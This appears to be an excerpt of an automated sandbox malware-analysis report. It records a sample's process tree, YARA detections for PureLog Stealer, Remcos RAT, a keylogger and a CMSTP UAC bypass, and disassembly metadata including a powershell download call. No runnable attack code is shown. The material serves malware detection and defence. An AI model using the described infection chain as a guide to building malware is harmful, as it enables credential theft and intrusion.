                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:12:50:18
                                                Start date:25/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                Imagebase:0x6b0000
                                                File size:65'440 bytes
                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:high
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 063F0FE7 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000003.2063389705.00000000063F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_3_63f0000_mshta.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction ID: 60420a577889b31d5509410d28ab386f35695eabf46adf4eb3e8584f263e1b00
                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction Fuzzy Hash:
                                                  Function 063F0FDF Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000003.2063389705.00000000063F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_3_63f0000_mshta.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction ID: 60420a577889b31d5509410d28ab386f35695eabf46adf4eb3e8584f263e1b00
                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction Fuzzy Hash:
                                                  Function 063F0FD7 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000003.2063389705.00000000063F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 063F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_3_63f0000_mshta.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction ID: 60420a577889b31d5509410d28ab386f35695eabf46adf4eb3e8584f263e1b00
                                                  • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                  • Instruction Fuzzy Hash:

                                                  Execution Graph

                                                  Execution Coverage:2.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:10.3%
                                                  Total number of Nodes:29
                                                  Total number of Limit Nodes:2
                                                  execution_graph 12305 3747480 12306 37474be 12305->12306 12307 374764b 12306->12307 12313 3747c45 12306->12313 12317 3747da8 12306->12317 12321 3747a18 12306->12321 12325 37479f7 12306->12325 12308 37475df 12314 3747b9a 12313->12314 12315 3747d57 12314->12315 12329 7dc464f 12314->12329 12318 3747cf9 12317->12318 12320 7dc464f 2 API calls 12318->12320 12319 3747d57 12320->12319 12322 3747a4c 12321->12322 12323 3747b30 12322->12323 12324 7dc464f 2 API calls 12322->12324 12323->12308 12324->12323 12327 3747a4c 12325->12327 12326 3747b30 12326->12308 12327->12326 12328 7dc464f 2 API calls 12327->12328 12328->12326 12331 7dc465e 12329->12331 12330 7dc4a93 12330->12315 12331->12330 12335 3747e00 12331->12335 12339 3747dff 12331->12339 12332 7dc4a34 12332->12315 12336 3747e4b URLDownloadToFileW 12335->12336 12338 3747ea8 12336->12338 12338->12332 12340 3747e4b URLDownloadToFileW 12339->12340 12342 3747ea8 12340->12342 12342->12332

                                                  Executed Functions

                                                  Function 03747E00 Relevance: 1.6, APIs: 1, Instructions: 65filenetworkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 519 3747e00-3747e52 521 3747e54-3747e5a 519->521 522 3747e5d-3747e63 519->522 521->522 523 3747e65-3747e6e 522->523 524 3747e71-3747ea6 URLDownloadToFileW 522->524 523->524 525 3747eaf-3747ec3 524->525 526 3747ea8-3747eae 524->526 526->525
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,?), ref: 03747E99
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2168712340.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_3740000_powershell.jbxd
                                                  Similarity
                                                  • API ID: DownloadFile
                                                  • String ID:
                                                  • API String ID: 1407266417-0
                                                  • Opcode ID: 531db28c5bf762f6fa063590f8f29a138adcbdaf243945da1ca944d416a00428
                                                  • Instruction ID: 394f7652a0bdba921f89d81103d43f695d43ef8eb5835612ef0608cc196909cf
                                                  • Opcode Fuzzy Hash: 531db28c5bf762f6fa063590f8f29a138adcbdaf243945da1ca944d416a00428
                                                  • Instruction Fuzzy Hash: 9921F6B5D01259DFCB04CF9AD984ADEFBB4FF48310F14852AE928A7210D375A954CFA4
                                                  Function 07DC464F Relevance: 2.9, Strings: 2, Instructions: 374COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 207 7dc464f-7dc4663 209 7dc4665-7dc4671 207->209 210 7dc4673 207->210 211 7dc4675-7dc4677 209->211 210->211 212 7dc467d-7dc4687 211->212 213 7dc4a93-7dc4a9d 211->213 214 7dc468d-7dc4692 212->214 215 7dc4af2-7dc4b13 212->215 216 7dc4a9f-7dc4aa8 213->216 217 7dc4aab-7dc4ab1 213->217 218 7dc46aa-7dc46b8 214->218 219 7dc4694-7dc469a 214->219 220 7dc4ab7-7dc4ac3 217->220 221 7dc4ab3-7dc4ab5 217->221 218->213 230 7dc46b9-7dc46c1 218->230 222 7dc469c 219->222 223 7dc469e-7dc46a9 219->223 224 7dc4ac5-7dc4aef 220->224 221->224 222->218 223->218 231 7dc472c-7dc473e 230->231 232 7dc46c3-7dc46dd 230->232 234 7dc4744-7dc476b 231->234 235 7dc47c6-7dc4815 231->235 232->213 242 7dc46e3-7dc46ed 232->242 244 7dc476d-7dc4773 234->244 245 7dc4785-7dc47b3 234->245 263 7dc481c-7dc482f 235->263 242->215 243 7dc46f3-7dc46f8 242->243 248 7dc46fa-7dc4700 243->248 249 7dc4710-7dc4714 243->249 246 7dc4775 244->246 247 7dc4777-7dc4783 244->247 261 7dc47b5-7dc47b7 245->261 262 7dc47c1-7dc47c4 245->262 246->245 247->245 251 7dc4704-7dc470e 248->251 252 7dc4702 248->252 249->213 254 7dc471a-7dc471e 249->254 251->249 252->249 254->213 257 7dc4724-7dc4728 254->257 257->213 257->231 261->262 262->263 264 7dc4835-7dc485c 263->264 265 7dc48b7-7dc4906 263->265 270 7dc485e-7dc4864 264->270 271 7dc4876-7dc48a4 264->271 282 7dc490d-7dc4920 265->282 273 7dc4868-7dc4874 270->273 274 7dc4866 270->274 280 7dc48a6-7dc48a8 271->280 281 7dc48b2-7dc48b5 271->281 273->271 274->271 280->281 281->282 283 7dc49a8-7dc49f7 282->283 284 7dc4926-7dc494d 282->284 301 7dc49fe-7dc4a2c 283->301 289 7dc494f-7dc4955 284->289 290 7dc4967-7dc4995 284->290 292 7dc4959-7dc4965 289->292 293 7dc4957 289->293 299 7dc4997-7dc4999 290->299 300 7dc49a3-7dc49a6 290->300 292->290 293->290 299->300 300->301 306 7dc4a2f call 3747e00 301->306 307 7dc4a2f call 3747dff 301->307 304 7dc4a34-7dc4a90 306->304 307->304
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tP]q$tP]q
                                                  • API String ID: 0-145478062
                                                  • Opcode ID: a98b171dd0fc7a0305096dd9e99becb977806d557212629eafa8fbbbcef9ce62
                                                  • Instruction ID: 4cc41ce008d98ef2975b49df51ae64e1fa3cfe08e2aa7a42059d447ec313119f
                                                  • Opcode Fuzzy Hash: a98b171dd0fc7a0305096dd9e99becb977806d557212629eafa8fbbbcef9ce62
                                                  • Instruction Fuzzy Hash: E3D116707002469FCB14CF68C560A6EFFE2EF89710F69856EE9419B394DA72DC41CBA1
                                                  Function 03747DFF Relevance: 1.6, APIs: 1, Instructions: 63filenetworkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 528 3747dff-3747e52 530 3747e54-3747e5a 528->530 531 3747e5d-3747e63 528->531 530->531 532 3747e65-3747e6e 531->532 533 3747e71-3747ea6 URLDownloadToFileW 531->533 532->533 534 3747eaf-3747ec3 533->534 535 3747ea8-3747eae 533->535 535->534
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(?,00000000,00000000,?,?), ref: 03747E99
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2168712340.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_3740000_powershell.jbxd
                                                  Similarity
                                                  • API ID: DownloadFile
                                                  • String ID:
                                                  • API String ID: 1407266417-0
                                                  • Opcode ID: d5e2d3a979cfe45653022726924e42443c91c9bb8b83333843cb3d00f62cf0b9
                                                  • Instruction ID: 282e05faf9bce4063efb6f875e054b79cc4c316d8ee3b633700887413b7ea397
                                                  • Opcode Fuzzy Hash: d5e2d3a979cfe45653022726924e42443c91c9bb8b83333843cb3d00f62cf0b9
                                                  • Instruction Fuzzy Hash: EC2105B5D01259DFCB04CF99D984ADEFBB4FF48310F14852AE928A7210D374AA54CFA0
                                                  Function 07DC1FD0 Relevance: .2, Instructions: 152COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 785 7dc1fd0-7dc1fd3 786 7dc203e-7dc2044 785->786 787 7dc1fd5-7dc1fe1 785->787 788 7dc2108-7dc2112 786->788 789 7dc2045-7dc204d 786->789 787->788 795 7dc1fe7-7dc1fee 787->795 793 7dc2114-7dc211d 788->793 794 7dc2120-7dc2126 788->794 791 7dc204f-7dc2056 789->791 792 7dc20b8-7dc20c0 789->792 798 7dc2060-7dc206f 791->798 808 7dc20fc-7dc2105 792->808 799 7dc212c-7dc2138 794->799 800 7dc2128-7dc212a 794->800 796 7dc2158-7dc217b 795->796 797 7dc1ff4-7dc1ff9 795->797 803 7dc1ffb-7dc2001 797->803 804 7dc2011-7dc2020 797->804 798->788 813 7dc2075-7dc207c 798->813 801 7dc213a-7dc2155 799->801 800->801 809 7dc2005-7dc200f 803->809 810 7dc2003 803->810 804->788 814 7dc2026-7dc2044 804->814 809->804 810->804 816 7dc207e-7dc2099 813->816 817 7dc20c2-7dc20f5 813->817 814->788 829 7dc204a-7dc2056 814->829 822 7dc209b-7dc20a1 816->822 823 7dc20b3-7dc20b7 816->823 817->808 824 7dc20a5-7dc20b1 822->824 825 7dc20a3 822->825 828 7dc20be-7dc20c0 823->828 824->823 825->823 828->808 829->798
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ffa8e1a41cb6670e0a897025b5875df16a826c8e0799af659742631b6f78ef30
                                                  • Instruction ID: ba952a7c9a100e3985ea9fc706b9f730c760927d4865cc93b7280bc0f3720556
                                                  • Opcode Fuzzy Hash: ffa8e1a41cb6670e0a897025b5875df16a826c8e0799af659742631b6f78ef30
                                                  • Instruction Fuzzy Hash: BF4168B07083528FDB16DB688950669FBA2AFD2314B6480AEC641DF356CB36DD05C7B2
                                                  Function 07DC05F0 Relevance: .1, Instructions: 73COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 954 7dc05f0-7dc05fd 955 7dc05ff-7dc063e 954->955 956 7dc066b-7dc0675 954->956 967 7dc06bb-7dc06c0 955->967 968 7dc0640-7dc064e 955->968 957 7dc0677-7dc067d 956->957 958 7dc0680-7dc0686 956->958 959 7dc068c-7dc0698 958->959 960 7dc0688-7dc068a 958->960 962 7dc069a-7dc06b8 959->962 960->962 967->968 972 7dc0656-7dc0665 968->972 972->956
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd516ccc54e5c1110da998b396750268872605b15a6c1042a075c03f55dca873
                                                  • Instruction ID: 8ca4ea949b3da6e24e526a42ee4506cff1fbb39c6945fbb3ccb1d00373e2d5fe
                                                  • Opcode Fuzzy Hash: bd516ccc54e5c1110da998b396750268872605b15a6c1042a075c03f55dca873
                                                  • Instruction Fuzzy Hash: 171106B1344315ABD624DA7D9811B3EB7D6EBC5B11F60C42EE649CB380DD72DC4183A1
                                                  Function 07DC1FDE Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c0a8083782cf32bda4d5dd46ee9e13f85d78b4de0c1f685d8f710307cc51337
                                                  • Instruction ID: 4b16b8968684437e60192e905ca6cce402453ba1ec637870282e3ad4e9669c0e
                                                  • Opcode Fuzzy Hash: 1c0a8083782cf32bda4d5dd46ee9e13f85d78b4de0c1f685d8f710307cc51337
                                                  • Instruction Fuzzy Hash: EB11B7B0708202CFDB14DB54C941AADB762BF91754F6580AEC600AF355CB72ED41D771
                                                  Function 07DC05E9 Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 237d0c51dcc255441f47a5473d96d8bc886a962e04675a0cc7c447dab049e018
                                                  • Instruction ID: 4e90ccbf0fb1e5b74fac8e0bac9bf8906fc8e2d16d51921146e3cd7fe4e789be
                                                  • Opcode Fuzzy Hash: 237d0c51dcc255441f47a5473d96d8bc886a962e04675a0cc7c447dab049e018
                                                  • Instruction Fuzzy Hash: C90147B57443057BD7248A6E8901F2EB6D2AFC4B10F64C82AEA48EF3C0E9729C4043B1
                                                  Function 034FD006 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2165884770.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_34fd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dbd123fbed454e94e9193162bee241c42e307d16f68bf364f04efcd39c035ce2
                                                  • Instruction ID: 3bf68932ead93bcc282f7ab83aa70c9935da7be606970e33b87c64704ee8923c
                                                  • Opcode Fuzzy Hash: dbd123fbed454e94e9193162bee241c42e307d16f68bf364f04efcd39c035ce2
                                                  • Instruction Fuzzy Hash: 6701847140D3C09FD7128B25C894752BFB4DF43224F0D84DBD9848F2A7C2695848C776
                                                  Function 034FD01D Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2165884770.00000000034FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_34fd000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65fb7558850be87c09b88b348468f0d399f6f492b8d54812568ea08de0fdc50d
                                                  • Instruction ID: 7339a550ee741afc0961d96f76d77e3b751312cf2c1e3fc5dbd7e3333b143e70
                                                  • Opcode Fuzzy Hash: 65fb7558850be87c09b88b348468f0d399f6f492b8d54812568ea08de0fdc50d
                                                  • Instruction Fuzzy Hash: D001B171804300AEE7208A15C984B67BF98EF46228F1CC56BEE580E24AC2799846C6B9

                                                  Non-executed Functions

                                                  Function 03741D6A Relevance: .1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2168712340.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_3740000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e17684e39c77ce59a5eea3af2f312af1ce0858a606b67c2307696f5be939dda
                                                  • Instruction ID: d1d9c85430b9e7055d57ba02a29013563dc9b1de8acbff11b2573dff162e3d2a
                                                  • Opcode Fuzzy Hash: 2e17684e39c77ce59a5eea3af2f312af1ce0858a606b67c2307696f5be939dda
                                                  • Instruction Fuzzy Hash: 8E31C40644E7E11FD303A37869BA5C5BF70AE53064B0E46DBD0C18F1A3E6484A0EC3B6
                                                  Function 07DC0FD8 Relevance: 11.7, Strings: 9, Instructions: 472COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$tP]q$tP]q$$]q
                                                  • API String ID: 0-3647279530
                                                  • Opcode ID: e8436096cde9d9424e7f35c13e3eef16250e8474102d30e806e1113a77c169a3
                                                  • Instruction ID: ebf056d2cc65b5c5b0b5467c15e48e0103fd2e44f400a912bfcd71368a476cb6
                                                  • Opcode Fuzzy Hash: e8436096cde9d9424e7f35c13e3eef16250e8474102d30e806e1113a77c169a3
                                                  • Instruction Fuzzy Hash: 5DF137F170836B8FDB25CB6888117AAFBB5AF82315F24847FD545CB252DA36C841C7A1
                                                  Function 07DC3D30 Relevance: 5.3, Strings: 4, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$4']q$4']q
                                                  • API String ID: 0-1785108022
                                                  • Opcode ID: 6ff2745dcfd8da9f43c2400ee87f23a495142ffea62b10c835bcf724d91438e1
                                                  • Instruction ID: ca34851bfeb2f618c8f3f54756eca7bf5456882ffe30032158575063564b9e9a
                                                  • Opcode Fuzzy Hash: 6ff2745dcfd8da9f43c2400ee87f23a495142ffea62b10c835bcf724d91438e1
                                                  • Instruction Fuzzy Hash: 9981F1B0B08246CFCB15DB68D4506AAFFF9AF86210F18C5AED485CB256DA35C845C7A2
                                                  Function 07DC3550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: bf8bc88bc7180da0cb04491e97b261eb3c9fe2ac8a39d770929a5e9cf702079e
                                                  • Instruction ID: 543d1636bc80b48ad5d95e22baf16c7754aa69f3c5042b2cba10581c045dffa0
                                                  • Opcode Fuzzy Hash: bf8bc88bc7180da0cb04491e97b261eb3c9fe2ac8a39d770929a5e9cf702079e
                                                  • Instruction Fuzzy Hash: E32135B17642075BDB28DA6E9840B36FEEA9BC1715F60C43EDA45CB381DD36C8018362
                                                  Function 07DC0081 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.2175993070.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7dc0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q
                                                  • API String ID: 0-978391646
                                                  • Opcode ID: c9ca58520c68e1394290cac53d995929ed77bcde98e34b33700d451e3cff8b47
                                                  • Instruction ID: 641d7d8101a8358b51c4b6c200095828afaa788475b419ba316544bf465e302b
                                                  • Opcode Fuzzy Hash: c9ca58520c68e1394290cac53d995929ed77bcde98e34b33700d451e3cff8b47
                                                  • Instruction Fuzzy Hash: B101D620B0D3868FD72E832C1C71125AFB66F8295076A44EBC2C1EB297CE598C04C396

                                                  Executed Functions

                                                  Function 04C6D005 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2291054337.0000000004C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4c6d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d31f70a23c11ec1d5c40aa448f782f690a6cc8b2aa8fafcf8d7f8f3d7009208
                                                  • Instruction ID: 5834e168a4906d4d5530a6f172067be4377ef6486f1cf86b7c3e51f5ef671be0
                                                  • Opcode Fuzzy Hash: 4d31f70a23c11ec1d5c40aa448f782f690a6cc8b2aa8fafcf8d7f8f3d7009208
                                                  • Instruction Fuzzy Hash: 2B014C6110E3C09FE7128B259894B52BFB8EF43224F19C1DBD9898F2A3C2695849C772
                                                  Function 04C6D01D Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2291054337.0000000004C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4c6d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5d4b0ff3a63010c9c19ee3392a27da8ce267daf3554da6d36b7923857e6137f
                                                  • Instruction ID: ef73a3e1de3bb5dc44fe762dc739de48efa61ceae7154a989b3f10c62b312eee
                                                  • Opcode Fuzzy Hash: f5d4b0ff3a63010c9c19ee3392a27da8ce267daf3554da6d36b7923857e6137f
                                                  • Instruction Fuzzy Hash: F1012B31204340DAE7208E16DDC4B67FF9CEF86320F1CC52AED4B0B246C679A941CAB5
                                                  Function 04D83006 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2291695937.0000000004D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4d80000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a13a30c79266fc4ac7a681b100432e2c425063dfa8b53e6ea73d2f7d6922ed4
                                                  • Instruction ID: d183bb95678c9dba149afd87f16cd888689454a62c4cafb07d146c4236cab7a2
                                                  • Opcode Fuzzy Hash: 1a13a30c79266fc4ac7a681b100432e2c425063dfa8b53e6ea73d2f7d6922ed4
                                                  • Instruction Fuzzy Hash: 88F0D435A001099FCB15CF9DD990AEEF7B5FF88324F208159E519A72A1C732EC62CB60

                                                  Execution Graph

                                                  Execution Coverage:8.1%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:337
                                                  Total number of Limit Nodes:42
